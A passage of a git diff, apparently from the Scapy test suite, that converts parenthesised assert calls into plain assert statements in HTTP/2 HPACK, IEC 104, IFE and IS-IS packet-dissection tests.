h2.H2HeadersFrame) hdrs_frm = p[h2.H2HeadersFrame] -assert(len(p.hdrs) == 8) +assert len(p.hdrs) == 8 hdr = p.hdrs[0] -assert(isinstance(hdr, h2.HPackIndexedHdr)) -assert(hdr.magic == 1) -assert(hdr.index == 3) +assert isinstance(hdr, h2.HPackIndexedHdr) +assert hdr.magic == 1 +assert hdr.index == 3 hdr = p.hdrs[1] -assert(isinstance(hdr, h2.HPackLitHdrFldWithoutIndexing)) -assert(hdr.magic == 0) -assert(hdr.never_index == 0) -assert(hdr.index in [4, 5]) -assert(hdr.hdr_name is None) -assert(isinstance(hdr.hdr_value, h2.HPackHdrString)) -assert(hdr.hdr_value.data == 'HPackZString(/login.php)') +assert isinstance(hdr, h2.HPackLitHdrFldWithoutIndexing) +assert hdr.magic == 0 +assert hdr.never_index == 0 +assert hdr.index in [4, 5] +assert hdr.hdr_name is None +assert isinstance(hdr.hdr_value, h2.HPackHdrString) +assert hdr.hdr_value.data == 'HPackZString(/login.php)' hdr = p.hdrs[2] -assert(isinstance(hdr, h2.HPackIndexedHdr)) -assert(hdr.magic == 1) -assert(hdr.index == 7) +assert isinstance(hdr, h2.HPackIndexedHdr) +assert hdr.magic == 1 +assert hdr.index == 7 hdr = p.hdrs[3] -assert(isinstance(hdr, h2.HPackLitHdrFldWithoutIndexing)) -assert(hdr.magic == 0) -assert(hdr.never_index == 0) -assert(hdr.index == 31) -assert(hdr.hdr_name is None) -assert(isinstance(hdr.hdr_value, h2.HPackHdrString)) -assert(hdr.hdr_value.data == 'HPackZString(application/x-www-form-urlencoded)') +assert isinstance(hdr, h2.HPackLitHdrFldWithoutIndexing) +assert hdr.magic == 0 +assert hdr.never_index == 0 +assert hdr.index == 31 +assert hdr.hdr_name is None +assert isinstance(hdr.hdr_value, h2.HPackHdrString) +assert hdr.hdr_value.data == 'HPackZString(application/x-www-form-urlencoded)' hdr = p.hdrs[4] -assert(isinstance(hdr, h2.HPackLitHdrFldWithoutIndexing)) -assert(hdr.magic == 0) -assert(hdr.never_index == 0) -assert(hdr.index == 28) -assert(hdr.hdr_name is None) -assert(isinstance(hdr.hdr_value, h2.HPackHdrString)) -assert(hdr.hdr_value.data == 'HPackLiteralString(22)') +assert isinstance(hdr, h2.HPackLitHdrFldWithoutIndexing) +assert hdr.magic == 0 +assert hdr.never_index == 0 +assert hdr.index == 28 +assert hdr.hdr_name is None +assert isinstance(hdr.hdr_value, h2.HPackHdrString) +assert hdr.hdr_value.data == 'HPackLiteralString(22)' hdr = p.hdrs[5] -assert(isinstance(hdr, h2.HPackLitHdrFldWithoutIndexing)) -assert(hdr.magic == 0) -assert(hdr.never_index == 0) -assert(hdr.index == 58) -assert(hdr.hdr_name is None) -assert(isinstance(hdr.hdr_value, h2.HPackHdrString)) -assert(hdr.hdr_value.data == 'HPackZString(Mozilla/5.0 Generated by hand)') +assert isinstance(hdr, h2.HPackLitHdrFldWithoutIndexing) +assert hdr.magic == 0 +assert hdr.never_index == 0 +assert hdr.index == 58 +assert hdr.hdr_name is None +assert isinstance(hdr.hdr_value, h2.HPackHdrString) +assert hdr.hdr_value.data == 'HPackZString(Mozilla/5.0 Generated by hand)' hdr = p.hdrs[6] -assert(isinstance(hdr, h2.HPackLitHdrFldWithoutIndexing)) -assert(hdr.magic == 0) -assert(hdr.never_index == 0) -assert(hdr.index == 0) -assert(isinstance(hdr.hdr_name, h2.HPackHdrString)) -assert(hdr.hdr_name.data == 'HPackZString(x-generated-by)') -assert(isinstance(hdr.hdr_value, h2.HPackHdrString)) -assert(hdr.hdr_value.data == 'HPackLiteralString(Me)') +assert isinstance(hdr, h2.HPackLitHdrFldWithoutIndexing) +assert hdr.magic == 0 +assert hdr.never_index == 0 +assert hdr.index == 0 +assert isinstance(hdr.hdr_name, h2.HPackHdrString) +assert hdr.hdr_name.data == 'HPackZString(x-generated-by)' +assert isinstance(hdr.hdr_value, h2.HPackHdrString) +assert hdr.hdr_value.data == 'HPackLiteralString(Me)' hdr = p.hdrs[7] -assert(isinstance(hdr, h2.HPackIndexedHdr)) -assert(hdr.magic == 1) -assert(hdr.index == 62) +assert isinstance(hdr, h2.HPackIndexedHdr) +assert hdr.magic == 1 +assert hdr.index == 62 p = seq.frames[1] -assert(isinstance(p, h2.H2Frame)) -assert(p.type == 9) -assert(len(p.flags) == 0) -assert(p.stream_id == 1) -assert(isinstance(p.payload, h2.H2ContinuationFrame)) +assert isinstance(p, h2.H2Frame) +assert p.type == 9 +assert len(p.flags) == 0 +assert p.stream_id == 1 +assert isinstance(p.payload, h2.H2ContinuationFrame) hdrs_frm = p[h2.H2ContinuationFrame] -assert(len(p.hdrs) == 1) +assert len(p.hdrs) == 1 hdr = p.hdrs[0] -assert(isinstance(hdr, h2.HPackLitHdrFldWithoutIndexing)) -assert(hdr.magic == 0) -assert(hdr.never_index == 0) -assert(hdr.index == 0) -assert(isinstance(hdr.hdr_name, h2.HPackHdrString)) -assert(hdr.hdr_name.data == 'HPackZString(x-long-header)') -assert(isinstance(hdr.hdr_value, h2.HPackHdrString)) -assert(hdr.hdr_value.data == 'HPackZString({})'.format('a'*5000)) +assert isinstance(hdr, h2.HPackLitHdrFldWithoutIndexing) +assert hdr.magic == 0 +assert hdr.never_index == 0 +assert hdr.index == 0 +assert isinstance(hdr.hdr_name, h2.HPackHdrString) +assert hdr.hdr_name.data == 'HPackZString(x-long-header)' +assert isinstance(hdr.hdr_value, h2.HPackHdrString) +assert hdr.hdr_value.data == 'HPackZString({})'.format('a'*5000) p = seq.frames[2] -assert(isinstance(p, h2.H2Frame)) -assert(p.type == 9) -assert(len(p.flags) == 1) -assert('EH' in p.flags) -assert(p.stream_id == 1) -assert(isinstance(p.payload, h2.H2ContinuationFrame)) +assert isinstance(p, h2.H2Frame) +assert p.type == 9 +assert len(p.flags) == 1 +assert 'EH' in p.flags +assert p.stream_id == 1 +assert isinstance(p.payload, h2.H2ContinuationFrame) hdrs_frm = p[h2.H2ContinuationFrame] -assert(len(p.hdrs) == 1) +assert len(p.hdrs) == 1 hdr = p.hdrs[0] -assert(isinstance(hdr, h2.HPackLitHdrFldWithoutIndexing)) -assert(hdr.magic == 0) -assert(hdr.never_index == 0) -assert(hdr.index == 0) -assert(isinstance(hdr.hdr_name, h2.HPackHdrString)) -assert(hdr.hdr_name.data == 'HPackZString(x-long-header)') -assert(isinstance(hdr.hdr_value, h2.HPackHdrString)) -assert(hdr.hdr_value.data == 'HPackZString({})'.format('b'*5000)) +assert isinstance(hdr, h2.HPackLitHdrFldWithoutIndexing) +assert hdr.magic == 0 +assert hdr.never_index == 0 +assert hdr.index == 0 +assert isinstance(hdr.hdr_name, h2.HPackHdrString) +assert hdr.hdr_name.data == 'HPackZString(x-long-header)' +assert isinstance(hdr.hdr_value, h2.HPackHdrString) +assert hdr.hdr_value.data == 'HPackZString({})'.format('b'*5000) = HTTP/2 HPackHdrTable : Parsing Textual Representation with sensitive headers and non-indexable ones ~ http2 hpack hpackhdrtable helpers @@ -2243,77 +2243,77 @@ x-generation-date: 2016-08-11 h = h2.HPackHdrTable() seq = h.parse_txt_hdrs(hdrs, stream_id=1, body=body, is_sensitive=lambda n,v: n in ['x-generation-date'], should_index=lambda x: x != 'x-generated-by') -assert(isinstance(seq, h2.H2Seq)) -assert(len(seq.frames) == 2) +assert isinstance(seq, h2.H2Seq) +assert len(seq.frames) == 2 p = seq.frames[0] -assert(isinstance(p, h2.H2Frame)) -assert(p.type == 1) -assert(len(p.flags) == 1) -assert('EH' in p.flags) -assert(p.stream_id == 1) -assert(isinstance(p.payload, h2.H2HeadersFrame)) +assert isinstance(p, h2.H2Frame) +assert p.type == 1 +assert len(p.flags) == 1 +assert 'EH' in p.flags +assert p.stream_id == 1 +assert isinstance(p.payload, h2.H2HeadersFrame) hdrs_frm = p[h2.H2HeadersFrame] -assert(len(p.hdrs) == 8) +assert len(p.hdrs) == 8 hdr = p.hdrs[0] -assert(isinstance(hdr, h2.HPackIndexedHdr)) -assert(hdr.magic == 1) -assert(hdr.index == 3) +assert isinstance(hdr, h2.HPackIndexedHdr) +assert hdr.magic == 1 +assert hdr.index == 3 hdr = p.hdrs[1] -assert(isinstance(hdr, h2.HPackLitHdrFldWithIncrIndexing)) -assert(hdr.magic == 1) -assert(hdr.index in [4, 5]) -assert(hdr.hdr_name is None) -assert(isinstance(hdr.hdr_value, h2.HPackHdrString)) -assert(hdr.hdr_value.data == 'HPackZString(/login.php)') +assert isinstance(hdr, h2.HPackLitHdrFldWithIncrIndexing) +assert hdr.magic == 1 +assert hdr.index in [4, 5] +assert hdr.hdr_name is None +assert isinstance(hdr.hdr_value, h2.HPackHdrString) +assert hdr.hdr_value.data == 'HPackZString(/login.php)' hdr = p.hdrs[2] -assert(isinstance(hdr, h2.HPackIndexedHdr)) -assert(hdr.magic == 1) -assert(hdr.index == 7) +assert isinstance(hdr, h2.HPackIndexedHdr) +assert hdr.magic == 1 +assert hdr.index == 7 hdr = p.hdrs[3] -assert(isinstance(hdr, h2.HPackLitHdrFldWithIncrIndexing)) -assert(hdr.magic == 1) -assert(hdr.index == 31) -assert(hdr.hdr_name is None) -assert(isinstance(hdr.hdr_value, h2.HPackHdrString)) -assert(hdr.hdr_value.data == 'HPackZString(application/x-www-form-urlencoded)') +assert isinstance(hdr, h2.HPackLitHdrFldWithIncrIndexing) +assert hdr.magic == 1 +assert hdr.index == 31 +assert hdr.hdr_name is None +assert isinstance(hdr.hdr_value, h2.HPackHdrString) +assert hdr.hdr_value.data == 'HPackZString(application/x-www-form-urlencoded)' hdr = p.hdrs[4] -assert(isinstance(hdr, h2.HPackLitHdrFldWithIncrIndexing)) -assert(hdr.magic == 1) -assert(hdr.index == 28) -assert(hdr.hdr_name is None) -assert(isinstance(hdr.hdr_value, h2.HPackHdrString)) -assert(hdr.hdr_value.data == 'HPackLiteralString(22)') +assert isinstance(hdr, h2.HPackLitHdrFldWithIncrIndexing) +assert hdr.magic == 1 +assert hdr.index == 28 +assert hdr.hdr_name is None +assert isinstance(hdr.hdr_value, h2.HPackHdrString) +assert hdr.hdr_value.data == 'HPackLiteralString(22)' hdr = p.hdrs[5] -assert(isinstance(hdr, h2.HPackLitHdrFldWithIncrIndexing)) -assert(hdr.magic == 1) -assert(hdr.index == 58) -assert(hdr.hdr_name is None) -assert(isinstance(hdr.hdr_value, h2.HPackHdrString)) -assert(hdr.hdr_value.data == 'HPackZString(Mozilla/5.0 Generated by hand)') +assert isinstance(hdr, h2.HPackLitHdrFldWithIncrIndexing) +assert hdr.magic == 1 +assert hdr.index == 58 +assert hdr.hdr_name is None +assert isinstance(hdr.hdr_value, h2.HPackHdrString) +assert hdr.hdr_value.data == 'HPackZString(Mozilla/5.0 Generated by hand)' hdr = p.hdrs[6] -assert(isinstance(hdr, h2.HPackLitHdrFldWithoutIndexing)) -assert(hdr.magic == 0) -assert(hdr.never_index == 0) -assert(hdr.index == 0) -assert(isinstance(hdr.hdr_name, h2.HPackHdrString)) -assert(hdr.hdr_name.data == 'HPackZString(x-generated-by)') -assert(isinstance(hdr.hdr_value, h2.HPackHdrString)) -assert(hdr.hdr_value.data == 'HPackLiteralString(Me)') +assert isinstance(hdr, h2.HPackLitHdrFldWithoutIndexing) +assert hdr.magic == 0 +assert hdr.never_index == 0 +assert hdr.index == 0 +assert isinstance(hdr.hdr_name, h2.HPackHdrString) +assert hdr.hdr_name.data == 'HPackZString(x-generated-by)' +assert isinstance(hdr.hdr_value, h2.HPackHdrString) +assert hdr.hdr_value.data == 'HPackLiteralString(Me)' hdr = p.hdrs[7] -assert(isinstance(hdr, h2.HPackLitHdrFldWithoutIndexing)) -assert(hdr.magic == 0) -assert(hdr.never_index == 1) -assert(hdr.index == 0) -assert(isinstance(hdr.hdr_name, h2.HPackHdrString)) -assert(hdr.hdr_name.data == 'HPackZString(x-generation-date)') -assert(isinstance(hdr.hdr_value, h2.HPackHdrString)) -assert(hdr.hdr_value.data == 'HPackZString(2016-08-11)') +assert isinstance(hdr, h2.HPackLitHdrFldWithoutIndexing) +assert hdr.magic == 0 +assert hdr.never_index == 1 +assert hdr.index == 0 +assert isinstance(hdr.hdr_name, h2.HPackHdrString) +assert hdr.hdr_name.data == 'HPackZString(x-generation-date)' +assert isinstance(hdr.hdr_value, h2.HPackHdrString) +assert hdr.hdr_value.data == 'HPackZString(2016-08-11)' p = seq.frames[1] -assert(isinstance(p, h2.H2Frame)) -assert(p.type == 0) -assert(len(p.flags) == 1) -assert('ES' in p.flags) -assert(p.stream_id == 1) -assert(isinstance(p.payload, h2.H2DataFrame)) +assert isinstance(p, h2.H2Frame) +assert p.type == 0 +assert len(p.flags) == 1 +assert 'ES' in p.flags +assert p.stream_id == 1 +assert isinstance(p.payload, h2.H2DataFrame) pay = p[h2.H2DataFrame] -assert(pay.data == body) +assert pay.data == body diff --git a/test/contrib/iec104.uts b/test/contrib/iec104.uts index 6f5d55e2455..4ab561cd030 100644 --- a/test/contrib/iec104.uts +++ b/test/contrib/iec104.uts @@ -13,10 +13,10 @@ load_contrib('scada.iec104') = class attribute generator -assert(IEC104_IE_QOC.QU_FLAG_RESERVED_COMPATIBLE_4 == 4) -assert(IEC104_IE_QOC.QU_FLAG_RESERVED_COMPATIBLE_8 == 8) -assert(IEC104_IE_QOC.QU_FLAG_RESERVED_PREDEFINED_FUNCTION_9 == 9) -assert(IEC104_IE_QOC.QU_FLAG_RESERVED_PREDEFINED_FUNCTION_15 == 15) +assert IEC104_IE_QOC.QU_FLAG_RESERVED_COMPATIBLE_4 == 4 +assert IEC104_IE_QOC.QU_FLAG_RESERVED_COMPATIBLE_8 == 8 +assert IEC104_IE_QOC.QU_FLAG_RESERVED_PREDEFINED_FUNCTION_9 == 9 +assert IEC104_IE_QOC.QU_FLAG_RESERVED_PREDEFINED_FUNCTION_15 == 15 = IEC60870_5_4_NormalizedFixPoint @@ -37,8 +37,8 @@ nfp = IEC60870_5_4_NormalizedFixPoint('foo', 0) for num_raw, num_fp, num_ss in test_data: i_val = nfp.getfield(None, num_raw)[1] - assert(i_val == num_ss) - assert(round(nfp.i2h(None, i_val), 6) == round(num_fp, 6)) + assert i_val == num_ss + assert round(nfp.i2h(None, i_val), 6) == round(num_fp, 6) = Iec104SequenceNumber field @@ -63,8 +63,8 @@ test_data = { } for key in test_data: - assert(iec104_seq_num.getfield(None, test_data[key])[1] == key) - assert(iec104_seq_num.addfield(None, b'', key) == test_data[key]) + assert iec104_seq_num.getfield(None, test_data[key])[1] == key + assert iec104_seq_num.addfield(None, b'', key) == test_data[key] + raw layer dissection @@ -73,14 +73,14 @@ for key in test_data: raw_u_msg = b'\x68\x04\x83\x00\x00\x00' lyr = iec104_decode(b'\x68\x04\x83\x00\x00\x00') -assert(lyr.__class__ == IEC104_U_Message) +assert lyr.__class__ == IEC104_U_Message = IEC104_S_Message raw_s_msg = b'\x68\x04\x01\x00\xa6\x17' lyr = iec104_decode(raw_s_msg) -assert(lyr.__class__ == IEC104_S_Message) +assert lyr.__class__ == IEC104_S_Message = IEC104_I_Message_SeqIOA @@ -88,14 +88,14 @@ raw_i_msg_seq_ioa = b'\x68\x1f\x2c\x00\x04\x00' # APCI raw_i_msg_seq_ioa += b'\x01\x92\x14\x00\x23\x00\x12\x54\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' # ASDU lyr = iec104_decode(raw_i_msg_seq_ioa) -assert(lyr.__class__ == IEC104_I_Message_SeqIOA) +assert lyr.__class__ == IEC104_I_Message_SeqIOA = IEC104_I_Message_SingleIOA raw_i_msg_single_ioa = b'\x68\x0e\x00\x00\x00\x00\x64\x01\x06\x00\x0a\x00\x00\x00\x00\x14' lyr = iec104_decode(raw_i_msg_single_ioa) -assert(lyr.__class__ == IEC104_I_Message_SingleIOA) +assert lyr.__class__ == IEC104_I_Message_SingleIOA + IEC104 S Message @@ -105,21 +105,21 @@ s_msg = b'\x68\x04\x01\x00\xa6\x17' s_msg = IEC104_S_Message(s_msg) -assert(s_msg.rx_seq_num == 3027) +assert s_msg.rx_seq_num == 3027 raw_s_message = b'\x00\x14\xab\x00\x3c\x13\x00\x1b\x8d\xf1\xdc\x12\x08\x00\x45\x10\x00\x3a\x8d\xdb\x40\x00\x3d\x06\x54\x46\x1a\x52\x01\xde\xc1\x28\x15\x5c\xaa\x56\x09\x64\x16\x67\x6c\xd7\x53\x07\x28\x98\x80\x18\x79\x5e\x9b\x14\x00\x00\x01\x01\x08\x0a\x9e\x08\xaa\x23\x73\xe8\x6c\xc3\x68\x04\x01\x00\xc2\x3a' frm = Ether(raw_s_message) s_msg = frm.getlayer(IEC104_S_Message) -assert(s_msg) -assert(s_msg.rx_seq_num == 7521) +assert s_msg +assert s_msg.rx_seq_num == 7521 frm = Ether(frm.do_build()) s_msg = frm.getlayer(IEC104_S_Message) -assert(s_msg) -assert(s_msg.rx_seq_num == 7521) +assert s_msg +assert s_msg.rx_seq_num == 7521 = double IEC104 S Message (test layer binding) @@ -128,22 +128,22 @@ raw_double_s_message = b'\x00\x14\xab\x00\x3c\x13\x00\x1b\x8d\xf1\xdc\x12\x08\x0 frm = Ether(raw_double_s_message) s_msg = frm.getlayer(IEC104_S_Message) -assert(s_msg) -assert(s_msg.rx_seq_num == 7521) +assert s_msg +assert s_msg.rx_seq_num == 7521 s_msg = frm.getlayer(IEC104_S_Message, nb=2) -assert(s_msg) -assert(s_msg.rx_seq_num == 7649) +assert s_msg +assert s_msg.rx_seq_num == 7649 frm = Ether(frm.do_build()) s_msg = frm.getlayer(IEC104_S_Message) -assert(s_msg) -assert(s_msg.rx_seq_num == 7521) +assert s_msg +assert s_msg.rx_seq_num == 7521 s_msg = frm.getlayer(IEC104_S_Message, nb=2) -assert(s_msg) -assert(s_msg.rx_seq_num == 7649) +assert s_msg +assert s_msg.rx_seq_num == 7649 + IEC104 U Message @@ -152,37 +152,37 @@ assert(s_msg.rx_seq_num == 7649) frm = Ether()/IP()/TCP()/IEC104_U_Message(startdt_act = 1, stopdt_con = 1, testfr_act=1) frm = Ether(frm.do_build()) u_msg = frm.getlayer(IEC104_U_Message) -assert(u_msg) -assert(u_msg.startdt_act == 1) -assert(u_msg.startdt_con == 0) -assert(u_msg.stopdt_con == 1) -assert(u_msg.stopdt_act == 0) -assert(u_msg.testfr_act == 1) -assert(u_msg.testfr_con == 0) +assert u_msg +assert u_msg.startdt_act == 1 +assert u_msg.startdt_con == 0 +assert u_msg.stopdt_con == 1 +assert u_msg.stopdt_act == 0 +assert u_msg.testfr_act == 1 +assert u_msg.testfr_con == 0 u_msg_tst_act = b'\x68\x04\x43\x00\x00\x00' u_msg = IEC104_U_Message(u_msg_tst_act) -assert(u_msg.testfr_act == 1) +assert u_msg.testfr_act == 1 u_msg_tst_con = b'\x68\x04\x83\x00\x00\x00' u_msg = IEC104_U_Message(u_msg_tst_con) -assert(u_msg.testfr_con == 1) +assert u_msg.testfr_con == 1 u_msg_startdt_act = b'\x68\x04\x07\x00\x00\x00' u_msg = IEC104_U_Message(u_msg_startdt_act) -assert(u_msg.startdt_act == 1) +assert u_msg.startdt_act == 1 u_msg_startdt_con = b'\x68\x04\x0b\x00\x00\x00' u_msg = IEC104_U_Message(u_msg_startdt_con) -assert(u_msg.startdt_con == 1) +assert u_msg.startdt_con == 1 u_msg_stopdt_act = b'\x68\x04\x13\x00\x00\x00' u_msg = IEC104_U_Message(u_msg_stopdt_act) -assert(u_msg.stopdt_act == 1) +assert u_msg.stopdt_act == 1 u_msg_stopdt_con = b'\x68\x04\x23\x00\x00\x00' u_msg = IEC104_U_Message(u_msg_stopdt_con) -assert(u_msg.stopdt_con == 1) +assert u_msg.stopdt_con == 1 = double IEC104 U Message @@ -192,16 +192,16 @@ frm = Ether()/IP()/TCP()/\ frm = Ether(frm.do_build()) u_msg = frm.getlayer(IEC104_U_Message) -assert(u_msg) -assert(u_msg.startdt_act == 1) -assert(u_msg.stopdt_con == 1) -assert(u_msg.testfr_act == 1) +assert u_msg +assert u_msg.startdt_act == 1 +assert u_msg.stopdt_con == 1 +assert u_msg.testfr_act == 1 u_msg = frm.getlayer(IEC104_U_Message, nb=2) -assert(u_msg) -assert(u_msg.startdt_con == 1) -assert(u_msg.stopdt_act == 1) -assert(u_msg.testfr_con == 1) +assert u_msg +assert u_msg.startdt_con == 1 +assert u_msg.stopdt_act == 1 +assert u_msg.testfr_con == 1 + IEC104 I Message @@ -212,7 +212,7 @@ for io_id in IEC104_IO_CLASSES: frm = Ether()/IP()/TCP(sport=IEC_104_IANA_PORT, dport=56780)/IEC104_I_Message_SeqIOA(io=io_class()) frm = Ether(frm.do_build()) io_layer = frm.getlayer(io_class) - assert(io_layer) + assert io_layer = Single IOA, single IO - information object types dissection @@ -221,7 +221,7 @@ for io_id in IEC104_IO_WITH_IOA_CLASSES: frm = Ether()/IP()/TCP(sport=IEC_104_IANA_PORT, dport=56780)/IEC104_I_Message_SingleIOA(io=io_class()) frm = Ether(frm.do_build()) io_layer = frm.getlayer(io_class) - assert(io_layer) + assert io_layer = Sequence IOA, multiple IOs - information object types dissection @@ -229,9 +229,9 @@ frm = Ether()/IP()/TCP(sport=IEC_104_IANA_PORT, dport=56780)/IEC104_I_Message_Se frm = Ether(frm.do_build()) i_msg_lyr = frm.getlayer(IEC104_I_Message_SeqIOA) -assert(i_msg_lyr) +assert i_msg_lyr -assert(i_msg_lyr.information_object_address == 1234) +assert i_msg_lyr.information_object_address == 1234 m_sp_ta_1_lyr = i_msg_lyr.io[0] assert (m_sp_ta_1_lyr.minutes == 1) @@ -249,7 +249,7 @@ frm = Ether()/IP()/TCP(sport=IEC_104_IANA_PORT, dport=56780)/\ frm = Ether(frm.do_build()) i_msg_lyr = frm.getlayer(IEC104_I_Message_SingleIOA) -assert(i_msg_lyr) +assert i_msg_lyr m_sp_ta_1_lyr = i_msg_lyr.io[0] assert (m_sp_ta_1_lyr.information_object_address==1111) @@ -274,22 +274,22 @@ frm = Ether()/IP()/TCP(sport=IEC_104_IANA_PORT, dport=56780)/\ frm = Ether(frm.do_build()) i_msg_lyr = frm.getlayer(IEC104_I_Message_SeqIOA, nb=1) -assert(i_msg_lyr) +assert i_msg_lyr assert (i_msg_lyr.information_object_address == 1234) -assert(len(i_msg_lyr.io) == 2) -assert(i_msg_lyr.io[0].minutes == 1) -assert(i_msg_lyr.io[0].sec_milli == 2) -assert(i_msg_lyr.io[1].minutes == 3) -assert(i_msg_lyr.io[1].sec_milli == 4) +assert len(i_msg_lyr.io) == 2 +assert i_msg_lyr.io[0].minutes == 1 +assert i_msg_lyr.io[0].sec_milli == 2 +assert i_msg_lyr.io[1].minutes == 3 +assert i_msg_lyr.io[1].sec_milli == 4 i_msg_lyr = frm.getlayer(IEC104_I_Message_SeqIOA, nb=2) -assert(i_msg_lyr) +assert i_msg_lyr assert (i_msg_lyr.information_object_address == 5432) -assert(len(i_msg_lyr.io) == 2) -assert(i_msg_lyr.io[0].minutes == 5) -assert(i_msg_lyr.io[0].sec_milli == 6) -assert(i_msg_lyr.io[1].minutes == 7) -assert(i_msg_lyr.io[1].sec_milli == 8) +assert len(i_msg_lyr.io) == 2 +assert i_msg_lyr.io[0].minutes == 5 +assert i_msg_lyr.io[0].sec_milli == 6 +assert i_msg_lyr.io[1].minutes == 7 +assert i_msg_lyr.io[1].sec_milli == 8 = Single IOA, multiple APDUs @@ -305,24 +305,24 @@ frm = Ether()/IP()/TCP(sport=IEC_104_IANA_PORT, dport=56780)/\ frm = Ether(frm.do_build()) i_msg_lyr = frm.getlayer(IEC104_I_Message_SingleIOA, nb=1) -assert(i_msg_lyr) -assert(len(i_msg_lyr.io) == 2) +assert i_msg_lyr +assert len(i_msg_lyr.io) == 2 assert (i_msg_lyr.io[0].information_object_address == 1111) -assert(i_msg_lyr.io[0].minutes == 1) -assert(i_msg_lyr.io[0].sec_milli == 2) +assert i_msg_lyr.io[0].minutes == 1 +assert i_msg_lyr.io[0].sec_milli == 2 assert (i_msg_lyr.io[1].information_object_address == 2222) -assert(i_msg_lyr.io[1].minutes == 3) -assert(i_msg_lyr.io[1].sec_milli == 4) +assert i_msg_lyr.io[1].minutes == 3 +assert i_msg_lyr.io[1].sec_milli == 4 i_msg_lyr = frm.getlayer(IEC104_I_Message_SingleIOA, nb=2) -assert(i_msg_lyr) -assert(len(i_msg_lyr.io) == 2) +assert i_msg_lyr +assert len(i_msg_lyr.io) == 2 assert (i_msg_lyr.io[0].information_object_address == 3333) -assert(i_msg_lyr.io[0].minutes == 5) -assert(i_msg_lyr.io[0].sec_milli == 6) +assert i_msg_lyr.io[0].minutes == 5 +assert i_msg_lyr.io[0].sec_milli == 6 assert (i_msg_lyr.io[1].information_object_address == 4444) -assert(i_msg_lyr.io[1].minutes == 7) -assert(i_msg_lyr.io[1].sec_milli == 8) +assert i_msg_lyr.io[1].minutes == 7 +assert i_msg_lyr.io[1].sec_milli == 8 = Mixed Single and Sequence IOA, multiple APDU @@ -342,15 +342,15 @@ frm = Ether()/IP()/TCP(sport=IEC_104_IANA_PORT, dport=56780)/\ frm = Ether(frm.do_build()) i_msg_lyr = frm.getlayer(IEC104_I_Message_SeqIOA, nb=1) -assert(i_msg_lyr) +assert i_msg_lyr assert (i_msg_lyr.information_object_address == 1111) i_msg_lyr = frm.getlayer(IEC104_I_Message_SeqIOA, nb=2) -assert(i_msg_lyr) +assert i_msg_lyr assert (i_msg_lyr.information_object_address == 5555) i_msg_lyr = frm.getlayer(IEC104_I_Message_SingleIOA, nb=1) -assert(i_msg_lyr) +assert i_msg_lyr assert (i_msg_lyr.io[0].information_object_address == 3333) + mixed APDU types in one packet @@ -368,27 +368,27 @@ frm = Ether()/IP()/TCP(sport=IEC_104_IANA_PORT, dport=56780)/\ frm = Ether(frm.do_build()) i_msg = frm.getlayer(IEC104_I_Message_SeqIOA) -assert(i_msg) +assert i_msg u_msg = frm.getlayer(IEC104_U_Message) -assert(u_msg) +assert u_msg s_msg = frm.getlayer(IEC104_S_Message) -assert(s_msg) +assert s_msg + information elements & objects = ASDU allowed in given standard (examples) layer = IEC104_IO_M_SP_NA_1() -assert(layer.defined_for_iec_101() is True) -assert(layer.defined_for_iec_104() is True) +assert layer.defined_for_iec_101() is True +assert layer.defined_for_iec_104() is True layer = IEC104_IO_M_DP_TA_1() -assert(layer.defined_for_iec_101() is True) -assert(layer.defined_for_iec_104() is False) +assert layer.defined_for_iec_101() is True +assert layer.defined_for_iec_104() is False layer = IEC104_IO_C_SC_TA_1() -assert(layer.defined_for_iec_101() is False) -assert(layer.defined_for_iec_104() is True) +assert layer.defined_for_iec_101() is False +assert layer.defined_for_iec_104() is True = BCR - binary counter reading / IEC104_IO_M_IT_NA_1 - integrated totals @@ -402,11 +402,11 @@ for value, sequence in values: frm = Ether()/IP()/TCP()/IEC104_I_Message_SeqIOA(io=m_it_na) frm = Ether(frm.do_build()) i_msg = frm.getlayer(IEC104_I_Message_SeqIOA) -assert(i_msg) +assert i_msg for idx, value in enumerate(values): value, sequence = value - assert(i_msg.io[idx].counter_value == value) + assert i_msg.io[idx].counter_value == value assert (i_msg.io[idx].sq == sequence) = DIQ - double-point information with quality descriptor / IEC104_IO_M_DP_NA_1 - double-point information without time tag @@ -415,8 +415,8 @@ frm = Ether() / IP() / TCP() / IEC104_I_Message_SeqIOA(io=IEC104_IO_M_DP_NA_1(dp frm = Ether(frm.do_build()) i_msg = frm.getlayer(IEC104_I_Message_SeqIOA) -assert(i_msg) -assert(i_msg.io[0].dpi_value==IEC104_IE_DIQ.DPI_FLAG_STATE_UNDEFINED) +assert i_msg +assert i_msg.io[0].dpi_value==IEC104_IE_DIQ.DPI_FLAG_STATE_UNDEFINED = VTI - value with transient state indication / IEC104_IO_M_ST_NA_1 - step position information diff --git a/test/contrib/ife.uts b/test/contrib/ife.uts index f990d673d08..f39ed148fae 100644 --- a/test/contrib/ife.uts +++ b/test/contrib/ife.uts @@ -12,21 +12,21 @@ frm = Ether()/IFE(tlvs=[IFESKBMark(value=3), IFETCIndex(value=5)]) frm = Ether(bytes(frm)) -assert(IFE in frm) -assert(frm[IFE].tlvs[0].type == 1) -assert(frm[IFE].tlvs[0].length == 8) -assert(frm[IFE].tlvs[0].value == 3) -assert(frm[IFE].tlvs[1].type == 5) -assert(frm[IFE].tlvs[1].length == 6) -assert(frm[IFE].tlvs[1].value == 5) +assert IFE in frm +assert frm[IFE].tlvs[0].type == 1 +assert frm[IFE].tlvs[0].length == 8 +assert frm[IFE].tlvs[0].value == 3 +assert frm[IFE].tlvs[1].type == 5 +assert frm[IFE].tlvs[1].length == 6 +assert frm[IFE].tlvs[1].value == 5 = add padding if required frm = Ether()/IFE(tlvs=[IFETCIndex()]) -assert(len(raw(frm)) == 24) +assert len(raw(frm)) == 24 frm = Ether()/IFE(tlvs=[IFESKBMark(), IFETCIndex()]) -assert(len(raw(frm)) == 32) +assert len(raw(frm)) == 32 = variable payload diff --git a/test/contrib/isis.uts b/test/contrib/isis.uts index 217cc5ff2aa..69b50ecf004 100644 --- a/test/contrib/isis.uts +++ b/test/contrib/isis.uts @@ -10,12 +10,12 @@ from scapy.contrib.isis import * = Layer Binding p = Dot3()/LLC()/ISIS_CommonHdr()/ISIS_P2P_Hello() -assert(p[LLC].dsap == 0xfe) -assert(p[LLC].ssap == 0xfe) -assert(p[LLC].ctrl == 0x03) -assert(p[ISIS_CommonHdr].nlpid == 0x83) -assert(p[ISIS_CommonHdr].pdutype == 17) -assert(p[ISIS_CommonHdr].hdrlen == 20) +assert p[LLC].dsap == 0xfe +assert p[LLC].ssap == 0xfe +assert p[LLC].ctrl == 0x03 +assert p[ISIS_CommonHdr].nlpid == 0x83 